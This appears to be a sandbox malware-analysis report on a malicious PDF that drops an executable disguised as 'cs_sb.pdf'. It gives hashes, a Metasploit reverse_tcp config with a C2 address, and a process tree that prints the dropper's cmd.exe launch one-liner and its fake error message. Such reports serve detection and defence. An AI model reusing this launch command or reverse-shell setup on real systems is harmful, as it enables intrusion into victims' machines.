Overview

overview

10

Static

static

10

JaffaCakes...8e.pdf

windows7-x64

10

JaffaCakes...8e.pdf

windows10-2004-x64

3

cs_sb.exe

windows7-x64

10

cs_sb.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    140s
  • max time network
    143s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    25-12-2024 06:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    JaffaCakes118_9576d02a063672b2dda3060dc50cada3f1f8766b6986b8b47193e3df8b495c8e.pdf

  • Size

    932KB

  • MD5

    a0f48cf0432e7b21daafffb4f67f5dc4

  • SHA1

    92535d5a12248d620730b64af81c7716e9fccc62

  • SHA256

    9576d02a063672b2dda3060dc50cada3f1f8766b6986b8b47193e3df8b495c8e

  • SHA512

    010b6e06de8aad716287b2ae2dc7426a4493e4a3c891c847d5bd94ccc77055a0aebed6e525696805c30e76bee88c0e39394c7feba2154e5514241771691ab10d

  • SSDEEP

    24576:t/5xFNDwdEpg0Z6NWUzrjheEZjAowHKaEdx6KTmug:5zFND8r0oNWUzrjhmEdxJmh

Score
10/10
metasploitbackdoordiscoverytrojan

Malware Config

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

5.6.7.8:443

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

    trojanbackdoormetasploit
  • Metasploit family
    metasploit
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry class 31 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_9576d02a063672b2dda3060dc50cada3f1f8766b6986b8b47193e3df8b495c8e.pdf"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2524
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\cs_sb.pdf" (cd "Desktop"))&(if exist "My Documents\cs_sb.pdf" (cd "My Documents"))&(if exist "Documents\cs_sb.pdf" (cd "Documents"))&(if exist "Escritorio\cs_sb.pdf" (cd "Escritorio"))&(if exist "Mis Documentos\cs_sb.pdf" (cd "Mis Documentos"))&(start cs_sb.pdf) Could not open PDF: Something's wrong
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2812
      • \??\c:\Users\Admin\Documents\cs_sb.pdf
        cs_sb.pdf
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2616

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
    Filesize

    3KB

    MD5

    7e9707461d78dafc6215df5b63194885

    SHA1

    92864663e2b6825835cbbadb455f7b0369a7b4ed

    SHA256

    776a84b57e7c57c6c6f4537387ee415c70eb796433bbf7baba00358f026d964f

    SHA512

    64e07cfefcf5f59d70463914234db5677a20f265c2869a5ed08d225ced2d0c5fef69b7978020ac3cf0005a1c891f58062a41c8bc746b7f3857715e26a0013aa7

    Download Submit

  • C:\Users\Admin\Documents\cs_sb.pdf
    Filesize

    72KB

    MD5

    2a046253dbeefd2ec9ac226a31f9665f

    SHA1

    2b6c9d9a9d2b75772ce14f875791fb4fa9417429

    SHA256

    335563701953af482f55eb521dce276a2fb1f737a041261ca823ac62d75ac7c3

    SHA512

    ae7e0cab9aef11bb2c14aad3329210c005e7b78b9c69bfe2b232b16cc870a233c9b6731e142bf8412b40d1cc83aaf9cd306fc4709d53d1cfed7b32699460bbff

    Download Submit